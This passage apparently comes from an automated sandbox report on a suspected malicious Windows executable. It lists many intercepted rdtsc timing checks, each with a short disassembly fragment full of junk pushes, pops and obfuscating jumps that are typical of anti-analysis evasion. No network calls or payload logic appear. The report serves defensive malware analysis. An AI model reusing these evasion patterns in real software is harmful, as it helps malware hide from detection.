0x00000062 mov dword ptr [ebp+122D2716h], ecx 0x00000068 mov dword ptr [ebp+122D3523h], ecx 0x0000006e add eax, dword ptr [esp+24h] 0x00000072 jmp 00007F97B4EC49BBh 0x00000077 mov ebx, dword ptr [esp+24h] 0x0000007b mov dword ptr [ebp+122D20AFh], edi 0x00000081 push eax 0x00000082 push eax 0x00000083 push edx 0x00000084 jbe 00007F97B4EC49BCh 0x0000008a js 00007F97B4EC49B6h 0x00000090 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9A7F62 second address: 9A7F68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9A7F68 second address: 9A7F70 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9A70F0 second address: 9A70FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 jns 00007F97B4F2EDC6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9AA825 second address: 82E87C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4EC49BCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 09CA064Bh 0x00000010 mov edi, dword ptr [ebp+122D2396h] 0x00000016 push dword ptr [ebp+122D0C8Dh] 0x0000001c call dword ptr [ebp+122D1C25h] 0x00000022 pushad 0x00000023 mov dword ptr [ebp+122D2716h], edx 0x00000029 xor eax, eax 0x0000002b jmp 00007F97B4EC49BDh 0x00000030 cmc 0x00000031 mov edx, dword ptr [esp+28h] 0x00000035 jng 00007F97B4EC49C0h 0x0000003b mov dword ptr [ebp+122D2AD5h], eax 0x00000041 mov dword ptr [ebp+122D2716h], edi 0x00000047 mov esi, 0000003Ch 0x0000004c jmp 00007F97B4EC49BBh 0x00000051 cld 0x00000052 add esi, dword ptr [esp+24h] 0x00000056 stc 0x00000057 jc 00007F97B4EC49B7h 0x0000005d lodsw 0x0000005f mov dword ptr [ebp+122D2716h], ecx 0x00000065 mov dword ptr [ebp+122D3523h], ecx 0x0000006b add eax, dword ptr [esp+24h] 0x0000006f jmp 00007F97B4EC49BBh 0x00000074 mov ebx, dword ptr [esp+24h] 0x00000078 mov dword ptr [ebp+122D20AFh], edi 0x0000007e push eax 0x0000007f push eax 0x00000080 push edx 0x00000081 jbe 00007F97B4EC49BCh 0x00000087 js 00007F97B4EC49B6h 0x0000008d rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9AA9A0 second address: 9AA9BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push eax 0x0000000b jnl 00007F97B4F2EDCCh 0x00000011 pop eax 0x00000012 mov eax, dword ptr [eax] 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9AAA82 second address: 9AAA88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9AAA88 second address: 9AAA8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9AAA8D second address: 9AAA93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9AAA93 second address: 9AAAF3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ebx 0x0000000a jc 00007F97B4F2EDCCh 0x00000010 pop ebx 0x00000011 nop 0x00000012 jno 00007F97B4F2EDCBh 0x00000018 xor si, FDE6h 0x0000001d push 00000000h 0x0000001f mov dword ptr [ebp+122D23FEh], edi 0x00000025 call 00007F97B4F2EDC9h 0x0000002a jo 00007F97B4F2EDD7h 0x00000030 jmp 00007F97B4F2EDD1h 0x00000035 push eax 0x00000036 js 00007F97B4F2EDD4h 0x0000003c pushad 0x0000003d jns 00007F97B4F2EDC6h 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9AAAF3 second address: 9AAB21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 jmp 00007F97B4EC49BAh 0x0000000e mov eax, dword ptr [eax] 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F97B4EC49C7h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9AAB21 second address: 9AAB2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F97B4F2EDC6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9AAB2B second address: 9AAB2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9AAB2F second address: 9AAB47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jc 00007F97B4F2EDC6h 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9AAB47 second address: 9AAB95 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4EC49C3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a and edx, 61BAB0E9h 0x00000010 push 00000003h 0x00000012 sub dword ptr [ebp+122D1F1Ch], esi 0x00000018 push 00000000h 0x0000001a mov esi, 5B535E00h 0x0000001f push 00000003h 0x00000021 sbb edi, 66CBB41Eh 0x00000027 push F50B3086h 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007F97B4EC49C2h 0x00000033 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9AAC32 second address: 9AAC4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F97B4F2EDD6h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9AAC4C second address: 9AAC86 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F97B4EC49B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d cld 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push ebp 0x00000013 call 00007F97B4EC49B8h 0x00000018 pop ebp 0x00000019 mov dword ptr [esp+04h], ebp 0x0000001d add dword ptr [esp+04h], 00000017h 0x00000025 inc ebp 0x00000026 push ebp 0x00000027 ret 0x00000028 pop ebp 0x00000029 ret 0x0000002a push B907AE5Bh 0x0000002f pushad 0x00000030 pushad 0x00000031 pushad 0x00000032 popad 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9AAD1F second address: 9AAD35 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4F2EDD2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9AAD35 second address: 9AAD49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a pushad 0x0000000b pushad 0x0000000c jnp 00007F97B4EC49B6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9AAD49 second address: 9AAD5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F97B4F2EDCFh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9AAD5F second address: 9AAD81 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4EC49C3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push edx 0x00000013 pop edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9AAD81 second address: 9AAD87 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9AAD87 second address: 9AADBD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4EC49BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a or dword ptr [ebp+122D1F8Ah], ebx 0x00000010 lea ebx, dword ptr [ebp+1244F75Eh] 0x00000016 movzx esi, dx 0x00000019 xchg eax, ebx 0x0000001a pushad 0x0000001b push eax 0x0000001c pushad 0x0000001d popad 0x0000001e pop eax 0x0000001f pushad 0x00000020 ja 00007F97B4EC49B6h 0x00000026 pushad 0x00000027 popad 0x00000028 popad 0x00000029 popad 0x0000002a push eax 0x0000002b pushad 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9BB8C0 second address: 9BB8C5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9C9EF9 second address: 9C9F07 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F97B4EC49B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9C9F07 second address: 9C9F22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F97B4F2EDD7h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9A075A second address: 9A075E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9C7BE1 second address: 9C7BE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9C7E76 second address: 9C7EA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jo 00007F97B4EC49CFh 0x0000000d jne 00007F97B4EC49B6h 0x00000013 jmp 00007F97B4EC49C3h 0x00000018 pop edi 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c pushad 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9C7EA4 second address: 9C7EA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9C7EA9 second address: 9C7EB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9C7EB1 second address: 9C7EB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9C801A second address: 9C8020 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9C8020 second address: 9C803E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4F2EDD4h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9C81A8 second address: 9C81BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F97B4EC49B6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d js 00007F97B4EC49B6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9C81BB second address: 9C820D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 jo 00007F97B4F2EE13h 0x0000000d jns 00007F97B4F2EDEBh 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 jmp 00007F97B4F2EDD6h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9C864B second address: 9C8657 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F97B4EC49B6h 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9C8657 second address: 9C8660 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9C8940 second address: 9C8946 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9C8946 second address: 9C8979 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 push esi 0x00000006 pop esi 0x00000007 jnl 00007F97B4F2EDC6h 0x0000000d pop edi 0x0000000e jmp 00007F97B4F2EDD8h 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jne 00007F97B4F2EDC6h 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9C8979 second address: 9C898E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4EC49C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9C898E second address: 9C8996 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9C8996 second address: 9C899A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9C8B00 second address: 9C8B04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9C8B04 second address: 9C8B08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9C8B08 second address: 9C8B0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9C8B0E second address: 9C8B1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9C8B1A second address: 9C8B1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9C8B1E second address: 9C8B35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F97B4EC49B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f ja 00007F97B4EC49B8h 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9C8B35 second address: 9C8B3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9C8B3B second address: 9C8B3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9C9567 second address: 9C956D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9C99D0 second address: 9C99EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F97B4EC49C8h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9C99EE second address: 9C99FC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007F97B4F2EDC6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9C99FC second address: 9C9A23 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F97B4EC49B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F97B4EC49C7h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9C9A23 second address: 9C9A42 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4F2EDD9h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9C9A42 second address: 9C9A5A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F97B4EC49C3h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9C9D79 second address: 9C9D7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9C9D7D second address: 9C9D8D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4EC49BAh 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9CE430 second address: 9CE434 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9CE434 second address: 9CE47B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pushad 0x0000000a jno 00007F97B4EC49D1h 0x00000010 jmp 00007F97B4EC49C8h 0x00000015 push eax 0x00000016 push edx 0x00000017 push esi 0x00000018 pop esi 0x00000019 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 996267 second address: 99626B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9CF26F second address: 9CF27B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9CF27B second address: 9CF28A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 jp 00007F97B4F2EDCCh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9D0B76 second address: 9D0B96 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F97B4EC49B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F97B4EC49C2h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9D0B96 second address: 9D0B9B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9D3FCD second address: 9D3FD7 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F97B4EC49B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9D3FD7 second address: 9D3FDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9D3FDD second address: 9D3FFA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 jmp 00007F97B4EC49C4h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9D41A7 second address: 9D41CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jno 00007F97B4F2EDC6h 0x0000000d jmp 00007F97B4F2EDD5h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9D4307 second address: 9D431E instructions: 0x00000000 rdtsc 0x00000002 jns 00007F97B4EC49B6h 0x00000008 jbe 00007F97B4EC49B6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop edi 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9D431E second address: 9D432A instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F97B4F2EDC6h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9D432A second address: 9D4330 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9D49D0 second address: 9D49D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9D49D7 second address: 9D49DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9D6B93 second address: 9D6B99 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9D6C3D second address: 9D6C7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F97B4EC49C4h 0x00000009 popad 0x0000000a jc 00007F97B4EC49BCh 0x00000010 ja 00007F97B4EC49B6h 0x00000016 popad 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b jmp 00007F97B4EC49C3h 0x00000020 pop eax 0x00000021 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9D6D47 second address: 9D6D4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9D6D4B second address: 9D6D50 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9D6F1B second address: 9D6F31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F97B4F2EDC6h 0x0000000a popad 0x0000000b push eax 0x0000000c jns 00007F97B4F2EDE1h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9D6F31 second address: 9D6F35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9D7508 second address: 9D750C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9D750C second address: 9D7524 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F97B4EC49C4h 0x00000009 rdtsc
